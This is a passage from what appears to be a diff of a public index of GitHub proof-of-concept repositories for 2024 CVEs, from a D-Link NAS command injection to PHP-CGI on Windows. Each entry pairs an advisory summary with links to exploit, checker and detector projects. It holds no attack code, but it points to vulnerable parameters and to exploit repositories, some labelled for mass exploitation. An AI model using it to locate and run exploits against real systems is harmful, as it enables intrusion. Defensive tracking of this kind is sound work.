Manipulieren des Arguments Category Name/Model Name/Brand Name/Unit Name mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung. + + +- [lfillaz/CVE-2024-2997](https://github.com/lfillaz/CVE-2024-2997) + +### CVE-2024-3094 (2024-03-29) + +Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. \r\nThrough a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code. This results in a modified liblzma library that can be used by any software linked against this library, intercepting and modifying the data interaction with this library. + + +- [byinarie/CVE-2024-3094-info](https://github.com/byinarie/CVE-2024-3094-info) +- [FabioBaroni/CVE-2024-3094-checker](https://github.com/FabioBaroni/CVE-2024-3094-checker) +- [lypd0/CVE-2024-3094-Vulnerabity-Checker](https://github.com/lypd0/CVE-2024-3094-Vulnerabity-Checker) +- [OpensourceICTSolutions/xz_utils-CVE-2024-3094](https://github.com/OpensourceICTSolutions/xz_utils-CVE-2024-3094) +- [bioless/xz_cve-2024-3094_detection](https://github.com/bioless/xz_cve-2024-3094_detection) +- [Hacker-Hermanos/CVE-2024-3094_xz_check](https://github.com/Hacker-Hermanos/CVE-2024-3094_xz_check) +- [Fractal-Tess/CVE-2024-3094](https://github.com/Fractal-Tess/CVE-2024-3094) +- [wgetnz/CVE-2024-3094-check](https://github.com/wgetnz/CVE-2024-3094-check) +- [emirkmo/xz-backdoor-github](https://github.com/emirkmo/xz-backdoor-github) +- [ashwani95/CVE-2024-3094](https://github.com/ashwani95/CVE-2024-3094) +- [harekrishnarai/xz-utils-vuln-checker](https://github.com/harekrishnarai/xz-utils-vuln-checker) +- [teyhouse/CVE-2024-3094](https://github.com/teyhouse/CVE-2024-3094) +- [alokemajumder/CVE-2024-3094-Vulnerability-Checker-Fixer](https://github.com/alokemajumder/CVE-2024-3094-Vulnerability-Checker-Fixer) +- [Horizon-Software-Development/CVE-2024-3094](https://github.com/Horizon-Software-Development/CVE-2024-3094) +- [hazemkya/CVE-2024-3094-checker](https://github.com/hazemkya/CVE-2024-3094-checker) +- [lockness-Ko/xz-vulnerable-honeypot](https://github.com/lockness-Ko/xz-vulnerable-honeypot) +- [brinhosa/CVE-2024-3094-One-Liner](https://github.com/brinhosa/CVE-2024-3094-One-Liner) +- [isuruwa/CVE-2024-3094](https://github.com/isuruwa/CVE-2024-3094) +- [Yuma-Tsushima07/CVE-2024-3094](https://github.com/Yuma-Tsushima07/CVE-2024-3094) +- [jfrog/cve-2024-3094-tools](https://github.com/jfrog/cve-2024-3094-tools) +- [Simplifi-ED/CVE-2024-3094-patcher](https://github.com/Simplifi-ED/CVE-2024-3094-patcher) +- [gayatriracha/CVE-2024-3094-Nmap-NSE-script](https://github.com/gayatriracha/CVE-2024-3094-Nmap-NSE-script) +- [Mustafa1986/CVE-2024-3094](https://github.com/Mustafa1986/CVE-2024-3094) +- [MrBUGLF/XZ-Utils_CVE-2024-3094](https://github.com/MrBUGLF/XZ-Utils_CVE-2024-3094) +- [galacticquest/cve-2024-3094-detect](https://github.com/galacticquest/cve-2024-3094-detect) +- [mightysai1997/CVE-2024-3094-info](https://github.com/mightysai1997/CVE-2024-3094-info) +- [mightysai1997/CVE-2024-3094](https://github.com/mightysai1997/CVE-2024-3094) +- [mesutgungor/xz-backdoor-vulnerability](https://github.com/mesutgungor/xz-backdoor-vulnerability) +- [reuteras/CVE-2024-3094](https://github.com/reuteras/CVE-2024-3094) +- [amlweems/xzbot](https://github.com/amlweems/xzbot) +- [gustavorobertux/CVE-2024-3094](https://github.com/gustavorobertux/CVE-2024-3094) +- [ackemed/detectar_cve-2024-3094](https://github.com/ackemed/detectar_cve-2024-3094) +- [0xlane/xz-cve-2024-3094](https://github.com/0xlane/xz-cve-2024-3094) +- [dah4k/CVE-2024-3094](https://github.com/dah4k/CVE-2024-3094) +- [hackingetico21/revisaxzutils](https://github.com/hackingetico21/revisaxzutils) +- [devjanger/CVE-2024-3094-XZ-Backdoor-Detector](https://github.com/devjanger/CVE-2024-3094-XZ-Backdoor-Detector) +- [ScrimForever/CVE-2024-3094](https://github.com/ScrimForever/CVE-2024-3094) +- [pentestfunctions/CVE-2024-3094](https://github.com/pentestfunctions/CVE-2024-3094) +- [r0binak/xzk8s](https://github.com/r0binak/xzk8s) +- [przemoc/xz-backdoor-links](https://github.com/przemoc/xz-backdoor-links) +- [Security-Phoenix-demo/CVE-2024-3094-fix-exploits](https://github.com/Security-Phoenix-demo/CVE-2024-3094-fix-exploits) +- [MagpieRYL/CVE-2024-3094-backdoor-env-container](https://github.com/MagpieRYL/CVE-2024-3094-backdoor-env-container) +- [Bella-Bc/xz-backdoor-CVE-2024-3094-Check](https://github.com/Bella-Bc/xz-backdoor-CVE-2024-3094-Check) +- [TheTorjanCaptain/CVE-2024-3094-Checker](https://github.com/TheTorjanCaptain/CVE-2024-3094-Checker) +- [iheb2b/CVE-2024-3094-Checker](https://github.com/iheb2b/CVE-2024-3094-Checker) +- [felipecosta09/cve-2024-3094](https://github.com/felipecosta09/cve-2024-3094) +- [weltregie/liblzma-scan](https://github.com/weltregie/liblzma-scan) +- [crfearnworks/ansible-CVE-2024-3094](https://github.com/crfearnworks/ansible-CVE-2024-3094) +- [robertdebock/ansible-playbook-cve-2024-3094](https://github.com/robertdebock/ansible-playbook-cve-2024-3094) +- [badsectorlabs/ludus_xz_backdoor](https://github.com/badsectorlabs/ludus_xz_backdoor) +- [Juul/xz-backdoor-scan](https://github.com/Juul/xz-backdoor-scan) +- [fevar54/Detectar-Backdoor-en-liblzma-de-XZ-utils-CVE-2024-3094-](https://github.com/fevar54/Detectar-Backdoor-en-liblzma-de-XZ-utils-CVE-2024-3094-) +- [neuralinhibitor/xzwhy](https://github.com/neuralinhibitor/xzwhy) +- [AndreaCicca/Sicurezza-Informatica-Presentazione](https://github.com/AndreaCicca/Sicurezza-Informatica-Presentazione) +- [shefirot/CVE-2024-3094](https://github.com/shefirot/CVE-2024-3094) +- [DANO-AMP/CVE-2024-3094](https://github.com/DANO-AMP/CVE-2024-3094) +- [robertdfrench/ifuncd-up](https://github.com/robertdfrench/ifuncd-up) + +### CVE-2024-3105 (2024-06-15) + +The Woody code snippets – Insert Header Footer Code, AdSense Ads plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 2.5.0 via the 'insert_php' shortcode. This is due to the plugin not restricting the usage of the functionality to high level authorized users. This makes it possible for authenticated attackers, with contributor-level access and above, to execute code on the server. + + +- [hunThubSpace/CVE-2024-3105-PoC](https://github.com/hunThubSpace/CVE-2024-3105-PoC) + +### CVE-2024-3116 (2024-04-04) + +pgAdmin <= 8.4 is affected by a Remote Code Execution (RCE) vulnerability through the validate binary path API. This vulnerability allows attackers to execute arbitrary code on the server hosting PGAdmin, posing a severe risk to the database management system's integrity and the security of the underlying data.\n + + +- [TechieNeurons/CVE-2024-3116_RCE_in_pgadmin_8.4](https://github.com/TechieNeurons/CVE-2024-3116_RCE_in_pgadmin_8.4) + +### CVE-2024-3177 (2024-04-22) + +A security issue was discovered in Kubernetes where users may be able to launch containers that bypass the mountable secrets policy enforced by the ServiceAccount admission plugin when using containers, init containers, and ephemeral containers with the envFrom field populated. The policy ensures pods running with a service account may only reference secrets specified in the service account’s secrets field. Kubernetes clusters are only affected if the ServiceAccount admission plugin and the kubernetes.io/enforce-mountable-secrets annotation are used together with containers, init containers, and ephemeral containers with the envFrom field populated. + + +- [Cgv-Dev/Metasploit-Module-TFM](https://github.com/Cgv-Dev/Metasploit-Module-TFM) + +### CVE-2024-3183 (2024-06-12) + +A vulnerability was found in FreeIPA in a way when a Kerberos TGS-REQ is encrypted using the client’s session key. This key is different for each new session, which protects it from brute force attacks. However, the ticket it contains is encrypted using the target principal key directly. For user principals, this key is a hash of a public per-principal randomly-generated salt and the user’s password.\r\n\r\nIf a principal is compromised it means the attacker would be able to retrieve tickets encrypted to any principal, all of them being encrypted by their own key directly. By taking these tickets and salts offline, the attacker could run brute force attacks to find character strings able to decrypt tickets when combined to a principal salt (i.e. find the principal’s password). + + +- [Cyxow/CVE-2024-3183-POC](https://github.com/Cyxow/CVE-2024-3183-POC) + +### CVE-2024-3217 (2024-04-05) + +The WP Directory Kit plugin for WordPress is vulnerable to SQL Injection via the 'attribute_value' and 'attribute_id' parameters in all versions up to, and including, 1.3.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [BassamAssiri/CVE-2024-3217-POC](https://github.com/BassamAssiri/CVE-2024-3217-POC) + +### CVE-2024-3272 (2024-04-04) + +Eine Schwachstelle wurde in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L bis 20240403 entdeckt. Sie wurde als sehr kritisch eingestuft. Betroffen davon ist ein unbekannter Prozess der Datei /cgi-bin/nas_sharing.cgi der Komponente HTTP GET Request Handler. Mit der Manipulation des Arguments user mit der Eingabe messagebus mit unbekannten Daten kann eine hard-coded credentials-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [nickswink/D-Link-NAS-Devices-Unauthenticated-RCE](https://github.com/nickswink/D-Link-NAS-Devices-Unauthenticated-RCE) +- [aliask/dinkleberry](https://github.com/aliask/dinkleberry) + +### CVE-2024-3273 (2024-04-04) + +Es wurde eine Schwachstelle in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L bis 20240403 gefunden. Sie wurde als kritisch eingestuft. Betroffen hiervon ist ein unbekannter Ablauf der Datei /cgi-bin/nas_sharing.cgi der Komponente HTTP GET Request Handler. Durch die Manipulation des Arguments system mit unbekannten Daten kann eine command injection-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung. + + +- [Chocapikk/CVE-2024-3273](https://github.com/Chocapikk/CVE-2024-3273) +- [adhikara13/CVE-2024-3273](https://github.com/adhikara13/CVE-2024-3273) +- [yarienkiva/honeypot-dlink-CVE-2024-3273](https://github.com/yarienkiva/honeypot-dlink-CVE-2024-3273) +- [K3ysTr0K3R/CVE-2024-3273-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2024-3273-EXPLOIT) +- [ThatNotEasy/CVE-2024-3273](https://github.com/ThatNotEasy/CVE-2024-3273) +- [LeopoldSkell/CVE-2024-3273](https://github.com/LeopoldSkell/CVE-2024-3273) +- [mrrobot0o/CVE-2024-3273-](https://github.com/mrrobot0o/CVE-2024-3273-) +- [OIivr/Turvan6rkus-CVE-2024-3273](https://github.com/OIivr/Turvan6rkus-CVE-2024-3273) +- [X-Projetion/CVE-2024-3273-D-Link-Remote-Code-Execution-RCE](https://github.com/X-Projetion/CVE-2024-3273-D-Link-Remote-Code-Execution-RCE) + +### CVE-2024-3293 (2024-04-23) + +The rtMedia for WordPress, BuddyPress and bbPress plugin for WordPress is vulnerable to blind SQL Injection via the rtmedia_gallery shortcode in all versions up to, and including, 4.6.18 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [truonghuuphuc/CVE-2024-3293-Poc](https://github.com/truonghuuphuc/CVE-2024-3293-Poc) + +### CVE-2024-3400 (2024-04-12) + +A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.\n\nCloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability. + + +- [Yuvvi01/CVE-2024-3400](https://github.com/Yuvvi01/CVE-2024-3400) +- [CerTusHack/CVE-2024-3400-PoC](https://github.com/CerTusHack/CVE-2024-3400-PoC) +- [0x0d3ad/CVE-2024-3400](https://github.com/0x0d3ad/CVE-2024-3400) +- [FoxyProxys/CVE-2024-3400](https://github.com/FoxyProxys/CVE-2024-3400) +- [momika233/CVE-2024-3400](https://github.com/momika233/CVE-2024-3400) +- [MrR0b0t19/CVE-2024-3400](https://github.com/MrR0b0t19/CVE-2024-3400) +- [MurrayR0123/CVE-2024-3400-Compromise-Checker](https://github.com/MurrayR0123/CVE-2024-3400-Compromise-Checker) +- [AdaniKamal/CVE-2024-3400](https://github.com/AdaniKamal/CVE-2024-3400) +- [LoanVitor/CVE-2024-3400-](https://github.com/LoanVitor/CVE-2024-3400-) +- [h4x0r-dz/CVE-2024-3400](https://github.com/h4x0r-dz/CVE-2024-3400) +- [W01fh4cker/CVE-2024-3400-RCE-Scan](https://github.com/W01fh4cker/CVE-2024-3400-RCE-Scan) +- [CONDITIONBLACK/CVE-2024-3400-POC](https://github.com/CONDITIONBLACK/CVE-2024-3400-POC) +- [Chocapikk/CVE-2024-3400](https://github.com/Chocapikk/CVE-2024-3400) +- [ihebski/CVE-2024-3400](https://github.com/ihebski/CVE-2024-3400) +- [index2014/CVE-2024-3400-Checker](https://github.com/index2014/CVE-2024-3400-Checker) +- [ZephrFish/CVE-2024-3400-Canary](https://github.com/ZephrFish/CVE-2024-3400-Canary) +- [ak1t4/CVE-2024-3400](https://github.com/ak1t4/CVE-2024-3400) +- [retkoussa/CVE-2024-3400](https://github.com/retkoussa/CVE-2024-3400) +- [schooldropout1337/CVE-2024-3400](https://github.com/schooldropout1337/CVE-2024-3400) +- [hahasagined/CVE-2024-3400](https://github.com/hahasagined/CVE-2024-3400) +- [codeblueprint/CVE-2024-3400](https://github.com/codeblueprint/CVE-2024-3400) +- [swaybs/CVE-2024-3400](https://github.com/swaybs/CVE-2024-3400) +- [sxyrxyy/CVE-2024-3400-Check](https://github.com/sxyrxyy/CVE-2024-3400-Check) +- [Ravaan21/CVE-2024-3400](https://github.com/Ravaan21/CVE-2024-3400) +- [tfrederick74656/cve-2024-3400-poc](https://github.com/tfrederick74656/cve-2024-3400-poc) +- [pwnj0hn/CVE-2024-3400](https://github.com/pwnj0hn/CVE-2024-3400) +- [HackingLZ/panrapidcheck](https://github.com/HackingLZ/panrapidcheck) +- [Kr0ff/cve-2024-3400](https://github.com/Kr0ff/cve-2024-3400) +- [zam89/CVE-2024-3400-pot](https://github.com/zam89/CVE-2024-3400-pot) +- [terminalJunki3/CVE-2024-3400-Checker](https://github.com/terminalJunki3/CVE-2024-3400-Checker) +- [0xr2r/CVE-2024-3400-Palo-Alto-OS-Command-Injection](https://github.com/0xr2r/CVE-2024-3400-Palo-Alto-OS-Command-Injection) +- [marconesler/CVE-2024-3400](https://github.com/marconesler/CVE-2024-3400) +- [andrelia-hacks/CVE-2024-3400](https://github.com/andrelia-hacks/CVE-2024-3400) +- [tk-sawada/IPLineFinder](https://github.com/tk-sawada/IPLineFinder) +- [iwallarm/cve-2024-3400](https://github.com/iwallarm/cve-2024-3400) +- [workshop748/CVE-2024-3400](https://github.com/workshop748/CVE-2024-3400) + +### CVE-2024-3435 (2024-05-16) + +A path traversal vulnerability exists in the 'save_settings' endpoint of the parisneo/lollms-webui application, affecting versions up to the latest release before 9.5. The vulnerability arises due to insufficient sanitization of the 'config' parameter in the 'apply_settings' function, allowing an attacker to manipulate the application's configuration by sending specially crafted JSON payloads. This could lead to remote code execution (RCE) by bypassing existing patches designed to mitigate such vulnerabilities. + + +- [ymuraki-csc/cve-2024-3435](https://github.com/ymuraki-csc/cve-2024-3435) + +### CVE-2024-3495 (2024-05-22) + +The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the ‘cnt’ and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [truonghuuphuc/CVE-2024-3495-Poc](https://github.com/truonghuuphuc/CVE-2024-3495-Poc) +- [zomasec/CVE-2024-3495-POC](https://github.com/zomasec/CVE-2024-3495-POC) + +### CVE-2024-3552 (2024-06-13) + +The Web Directory Free WordPress plugin before 1.7.0 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection with different techniques like UNION, Time-Based and Error-Based. + + +- [truonghuuphuc/CVE-2024-3552-Poc](https://github.com/truonghuuphuc/CVE-2024-3552-Poc) + +### CVE-2024-3596 (2024-07-09) + +RADIUS Protocol under RFC 2865 is susceptible to forgery attacks by a local attacker who can modify any valid Response (Access-Accept, Access-Reject, or Access-Challenge) to any other response using a chosen-prefix collision attack against MD5 Response Authenticator signature. + + +- [alperenugurlu/CVE-2024-3596-Detector](https://github.com/alperenugurlu/CVE-2024-3596-Detector) + +### CVE-2024-3656 (2024-10-09) + +A flaw was found in Keycloak. Certain endpoints in Keycloak's admin REST API allow low-privilege users to access administrative functionalities. This flaw allows users to perform actions reserved for administrators, potentially leading to data breaches or system compromise. + + +- [h4x0r-dz/CVE-2024-3656](https://github.com/h4x0r-dz/CVE-2024-3656) + +### CVE-2024-3806 (2024-05-09) + +The Porto theme for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 7.1.0 via the 'porto_ajax_posts' function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php file type can be uploaded and included. + + +- [truonghuuphuc/CVE-2024-3806-AND-CVE-2024-3807-Poc](https://github.com/truonghuuphuc/CVE-2024-3806-AND-CVE-2024-3807-Poc) + +### CVE-2024-3867 (2024-04-16) + +The archive-tainacan-collection theme for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in version 2.7.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + + +- [c4cnm/CVE-2024-3867](https://github.com/c4cnm/CVE-2024-3867) + +### CVE-2024-3922 (2024-06-13) + +The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [truonghuuphuc/CVE-2024-3922-Poc](https://github.com/truonghuuphuc/CVE-2024-3922-Poc) + +### CVE-2024-4040 (2024-04-22) + +A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server.\n + + +- [airbus-cert/CVE-2024-4040](https://github.com/airbus-cert/CVE-2024-4040) +- [tucommenceapousser/CVE-2024-4040-Scanner](https://github.com/tucommenceapousser/CVE-2024-4040-Scanner) +- [rbih-boulanouar/CVE-2024-4040](https://github.com/rbih-boulanouar/CVE-2024-4040) +- [Mufti22/CVE-2024-4040](https://github.com/Mufti22/CVE-2024-4040) +- [Stuub/CVE-2024-4040-SSTI-LFI-PoC](https://github.com/Stuub/CVE-2024-4040-SSTI-LFI-PoC) +- [0xN7y/CVE-2024-4040](https://github.com/0xN7y/CVE-2024-4040) +- [Praison001/CVE-2024-4040-CrushFTP-server](https://github.com/Praison001/CVE-2024-4040-CrushFTP-server) +- [Mohammaddvd/CVE-2024-4040](https://github.com/Mohammaddvd/CVE-2024-4040) +- [jakabakos/CVE-2024-4040-CrushFTP-File-Read-vulnerability](https://github.com/jakabakos/CVE-2024-4040-CrushFTP-File-Read-vulnerability) +- [gotr00t0day/CVE-2024-4040](https://github.com/gotr00t0day/CVE-2024-4040) +- [1ncendium/CVE-2024-4040](https://github.com/1ncendium/CVE-2024-4040) +- [olebris/CVE-2024-4040](https://github.com/olebris/CVE-2024-4040) +- [entroychang/CVE-2024-4040](https://github.com/entroychang/CVE-2024-4040) +- [safeer-accuknox/CrushFTP-cve-2024-4040-poc](https://github.com/safeer-accuknox/CrushFTP-cve-2024-4040-poc) +- [geniuszlyy/GenCrushSSTIExploit](https://github.com/geniuszlyy/GenCrushSSTIExploit) +- [rahisec/CVE-2024-4040](https://github.com/rahisec/CVE-2024-4040) + +### CVE-2024-4231 (2024-05-10) + +This vulnerability exists in Digisol Router (DG-GR1321: Hardware version 3.7L; Firmware version : v3.2.02) due to presence of root terminal access on a serial interface without proper access control. An attacker with physical access could exploit this by identifying UART pins and accessing the root shell on the vulnerable system.\n\nSuccessful exploitation of this vulnerability could allow the attacker to access the sensitive information on the targeted system. + + +- [Redfox-Secuirty/Digisol-DG-GR1321-s-Improper-Access-Control-CVE-2024-4231](https://github.com/Redfox-Secuirty/Digisol-DG-GR1321-s-Improper-Access-Control-CVE-2024-4231) + +### CVE-2024-4232 (2024-05-10) + +This vulnerability exists in Digisol Router (DG-GR1321: Hardware version 3.7L; Firmware version : v3.2.02) due to lack of encryption or hashing in storing of passwords within the router's firmware/ database. An attacker with physical access could exploit this by extracting the firmware and reverse engineer the binary data to access the plaintext passwords on the vulnerable system.\n\nSuccessful exploitation of this vulnerability could allow the attacker to gain unauthorized access to the targeted system. + + +- [Redfox-Secuirty/Digisol-DG-GR1321-s-Password-Storage-in-Plaintext-CVE-2024-4232](https://github.com/Redfox-Secuirty/Digisol-DG-GR1321-s-Password-Storage-in-Plaintext-CVE-2024-4232) +- [Redfox-Secuirty/Digisol-DG--GR1321-s-Password-Storage-in-Plaintext--CVE-2024-4232](https://github.com/Redfox-Secuirty/Digisol-DG--GR1321-s-Password-Storage-in-Plaintext--CVE-2024-4232) + +### CVE-2024-4295 (2024-06-05) + +The Email Subscribers by Icegram Express plugin for WordPress is vulnerable to SQL Injection via the ‘hash’ parameter in all versions up to, and including, 5.7.20 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [truonghuuphuc/CVE-2024-4295-Poc](https://github.com/truonghuuphuc/CVE-2024-4295-Poc) +- [cve-2024/CVE-2024-4295-Poc](https://github.com/cve-2024/CVE-2024-4295-Poc) + +### CVE-2024-4320 (2024-06-06) + +A remote code execution (RCE) vulnerability exists in the '/install_extension' endpoint of the parisneo/lollms-webui application, specifically within the `@router.post("/install_extension")` route handler. The vulnerability arises due to improper handling of the `name` parameter in the `ExtensionBuilder().build_extension()` method, which allows for local file inclusion (LFI) leading to arbitrary code execution. An attacker can exploit this vulnerability by crafting a malicious `name` parameter that causes the server to load and execute a `__init__.py` file from an arbitrary location, such as the upload directory for discussions. This vulnerability affects the latest version of parisneo/lollms-webui and can lead to remote code execution without requiring user interaction, especially when the application is exposed to an external endpoint or operated in headless mode. + + +- [bolkv/CVE-2024-4320](https://github.com/bolkv/CVE-2024-4320) + +### CVE-2024-4323 (2024-05-20) + +A memory corruption vulnerability in Fluent Bit versions 2.0.7 thru 3.0.3. This issue lies in the embedded http server’s parsing of trace requests and may result in denial of service conditions, information disclosure, or remote code execution. + + +- [skilfoy/CVE-2024-4323-Exploit-POC](https://github.com/skilfoy/CVE-2024-4323-Exploit-POC) +- [d0rb/CVE-2024-4323](https://github.com/d0rb/CVE-2024-4323) +- [yuansec/CVE-2024-4323-dos_poc](https://github.com/yuansec/CVE-2024-4323-dos_poc) + +### CVE-2024-4351 (2024-05-16) + +The Tutor LMS Pro plugin for WordPress is vulnerable to unauthorized access of data, modification of data, loss of data due to a missing capability check on the 'authenticate' function in all versions up to, and including, 2.7.0. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to gain control of an existing administrator account. + + +- [ZSECURE/CVE-2024-4351](https://github.com/ZSECURE/CVE-2024-4351) + +### CVE-2024-4352 (2024-05-16) + +The Tutor LMS Pro plugin for WordPress is vulnerable to unauthorized access of data, modification of data, loss of data due to a missing capability check on the 'get_calendar_materials' function. The plugin is also vulnerable to SQL Injection via the ‘year’ parameter of that function due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [truonghuuphuc/CVE-2024-4352-Poc](https://github.com/truonghuuphuc/CVE-2024-4352-Poc) + +### CVE-2024-4358 (2024-05-29) + +In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability. + + +- [sinsinology/CVE-2024-4358](https://github.com/sinsinology/CVE-2024-4358) +- [RevoltSecurities/CVE-2024-4358](https://github.com/RevoltSecurities/CVE-2024-4358) +- [Harydhk7/CVE-2024-4358](https://github.com/Harydhk7/CVE-2024-4358) +- [Sk1dr0wz/CVE-2024-4358_Mass_Exploit](https://github.com/Sk1dr0wz/CVE-2024-4358_Mass_Exploit) +- [verylazytech/CVE-2024-4358](https://github.com/verylazytech/CVE-2024-4358) +- [gh-ost00/CVE-2024-4358](https://github.com/gh-ost00/CVE-2024-4358) + +### CVE-2024-4367 (2024-05-14) + +A type check was missing when handling fonts in PDF.js, which would allow arbitrary JavaScript execution in the PDF.js context. This vulnerability affects Firefox < 126, Firefox ESR < 115.11, and Thunderbird < 115.11. + + +- [LOURC0D3/CVE-2024-4367-PoC](https://github.com/LOURC0D3/CVE-2024-4367-PoC) +- [s4vvysec/CVE-2024-4367-POC](https://github.com/s4vvysec/CVE-2024-4367-POC) +- [spaceraccoon/detect-cve-2024-4367](https://github.com/spaceraccoon/detect-cve-2024-4367) +- [clarkio/pdfjs-vuln-demo](https://github.com/clarkio/pdfjs-vuln-demo) +- [avalahEE/pdfjs_disable_eval](https://github.com/avalahEE/pdfjs_disable_eval) +- [Zombie-Kaiser/cve-2024-4367-PoC-fixed](https://github.com/Zombie-Kaiser/cve-2024-4367-PoC-fixed) +- [snyk-labs/pdfjs-vuln-demo](https://github.com/snyk-labs/pdfjs-vuln-demo) +- [UnHackerEnCapital/PDFernetRemotelo](https://github.com/UnHackerEnCapital/PDFernetRemotelo) +- [Masamuneee/CVE-2024-4367-Analysis](https://github.com/Masamuneee/CVE-2024-4367-Analysis) +- [pedrochalegre7/CVE-2024-4367-pdf-sample](https://github.com/pedrochalegre7/CVE-2024-4367-pdf-sample) + +### CVE-2024-4406 (2024-05-02) + +Xiaomi Pro 13 GetApps integral-dialog-page Cross-Site Scripting Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Xiaomi Pro 13 smartphones. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the integral-dialog-page.html file. When parsing the integralInfo parameter, the process does not properly sanitize user-supplied data, which can lead to the injection of an arbitrary script. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-22332. + + +- [Yogehi/cve-2024-4406-xiaomi13pro-exploit-files](https://github.com/Yogehi/cve-2024-4406-xiaomi13pro-exploit-files) + +### CVE-2024-4439 (2024-05-03) + +WordPress Core is vulnerable to Stored Cross-Site Scripting via user display names in the Avatar block in various versions up to 6.5.2 due to insufficient output escaping on the display name. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. In addition, it also makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that have the comment block present and display the comment author's avatar. + + +- [MielPopsssssss/CVE-2024-4439](https://github.com/MielPopsssssss/CVE-2024-4439) +- [d0rb/CVE-2024-4439](https://github.com/d0rb/CVE-2024-4439) +- [xssor-dz/-CVE-2024-4439](https://github.com/xssor-dz/-CVE-2024-4439) +- [soltanali0/CVE-2024-4439](https://github.com/soltanali0/CVE-2024-4439) +- [w0r1i0g1ht/CVE-2024-4439](https://github.com/w0r1i0g1ht/CVE-2024-4439) + +### CVE-2024-4443 (2024-05-22) + +The Business Directory Plugin – Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the ‘listingfields’ parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [truonghuuphuc/CVE-2024-4443-Poc](https://github.com/truonghuuphuc/CVE-2024-4443-Poc) + +### CVE-2024-4577 (2024-06-09) + +In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc. + + +- [TAM-K592/CVE-2024-4577](https://github.com/TAM-K592/CVE-2024-4577) +- [ohhhh693/CVE-2024-4577](https://github.com/ohhhh693/CVE-2024-4577) +- [Junp0/CVE-2024-4577](https://github.com/Junp0/CVE-2024-4577) +- [princew88/CVE-2024-4577](https://github.com/princew88/CVE-2024-4577) +- [11whoami99/CVE-2024-4577](https://github.com/11whoami99/CVE-2024-4577) +- [watchtowrlabs/CVE-2024-4577](https://github.com/watchtowrlabs/CVE-2024-4577) +- [zjhzjhhh/CVE-2024-4577](https://github.com/zjhzjhhh/CVE-2024-4577) +- [huseyinstif/CVE-2024-4577-Nuclei-Template](https://github.com/huseyinstif/CVE-2024-4577-Nuclei-Template) +- [taida957789/CVE-2024-4577](https://github.com/taida957789/CVE-2024-4577) +- [Wh02m1/CVE-2024-4577](https://github.com/Wh02m1/CVE-2024-4577) +- 